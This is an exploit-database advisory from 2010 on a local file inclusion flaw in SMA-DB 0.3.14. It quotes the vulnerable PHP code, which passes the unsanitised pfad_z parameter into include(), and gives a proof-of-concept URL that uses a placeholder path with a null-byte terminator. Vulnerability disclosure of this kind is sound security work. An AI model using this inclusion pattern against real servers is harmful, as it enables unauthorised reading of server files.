SMA-DB 0.3.14 (pfad_z) Local File Inclusion Vulnerability

2010-08-04T00:00:00
ID 1337DAY-ID-13572
Type zdt
Reporter eidelweiss
Modified 2010-08-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =========================================================
SMA-DB 0.3.14 (pfad_z) Local File Inclusion Vulnerability
=========================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0     _                   __           __       __                     1
 1   /' \            __  /'__`\        /\ \__  /'__`\                   0
 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
 1                  \ \____/ >> Exploit database separated by exploit   0
 0                   \/___/          type (local, remote, DoS, etc.)    1
 1                                                                      1
 0  [+] Site            : Inj3ct0r.com                                  0
 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
 0                                                                      0
 1                    ########################################          1
 0                    I'm eidelweiss member from Inj3ct0r Team          1
 1                    ########################################          0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


Vendor: http://bluevirus.ch/
Download: http://bluevirus.ch/media/downloads/SMA-DB_v0.3.14.7z
Author: eidelweiss
Contact: [email protected]


=================================================================

Description:

Written in PHP4: SMA-DB is a Database to manage yours and see or loan your friends movies and software.
Equiped with an auto-complete function it is easy to add movies to the database.
Designed for modern browsers on PC (i.e. Firefox, IE 5.5+, Opera 7+) , Mac (ie. Firefox, Opera 7+, Safari) or PDA (i.e. PocketIE, Opera 8.5, not with Minimo).

Current version: 0.3.14
Last update: 18.04.2009  

=================================================================

	-=[ vuln c0de ]=-

[-]theme/settings.php

#############################
## no changes bellow here  ##
#############################
include("theme/options.php");
//  Jeweiliger Zielpfad, ab hier
$pfad_z=( (isset($pfad_z) and !isset($_GET['pfad_z']) and !isset($_POST['pfad_z']) and !isset($_COOKIE['pfad_z']) )?$pfad_z:"");
include($pfad_z."language/$l_language_default.php");	// Standartsprache laden
include_once("scripts/logging.php");
include_once($pfad_z."scripts/db_q.php");		// Funktion f?r DB-Queries
include_once($pfad_z."scripts/session.php");

=================================================================

	-=[ P0C ]=-

	http://127.0.0.1/path/theme/settings.php?pfad_z= [LFI]%00


=========================| -=[ E0F ]=- |==============================



#  0day.today [2018-01-10]  #